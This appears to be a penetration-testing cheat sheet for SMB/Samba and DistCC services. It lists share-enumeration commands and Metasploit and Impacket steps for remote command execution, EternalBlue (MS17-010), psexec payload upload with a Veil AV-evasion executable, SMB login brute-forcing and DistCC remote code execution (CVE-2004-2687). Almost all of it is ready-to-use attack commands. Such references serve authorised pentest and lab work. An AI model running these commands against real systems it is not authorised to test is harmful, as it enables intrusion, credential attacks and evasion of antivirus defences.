Services

Samba

Enumeration

Smbclient

List all shares

smbclient -L \\\\<URL>\\

Crackmapexec

List all shares

crackmapexec smb <ip> -u <username> -p <password> --shares

Psexec_command or Usermap_script Msf

Execute a command over SMB

use auxiliary/admin/smb/psexec_command

set COMMAND [command you want to run at the command line]

# or

use exploit/multi/samba/usermap_script

Foothold

MS17-010

EternalBlue exploitation

use ms17_010

Psexec.py

Use an administrator password to get write access to the ADMIN$ share, then upload a payload and execute it

psexec.py <username>@<host>

Psexec Msf

Use once you have a user credential

use exploit/windows/smb/psexec

# Optional: custom executable (Veil AV-evasion payload)
set EXE::Custom /root/veil-output/compiled/updater12.exe

Smb_login Msf

Brute-force login credentials

use auxiliary/scanner/smb/smb_login

DistCC

Foothold

CVE-2004-2687

Remote Code Execution

use exploit/unix/misc/distcc_exec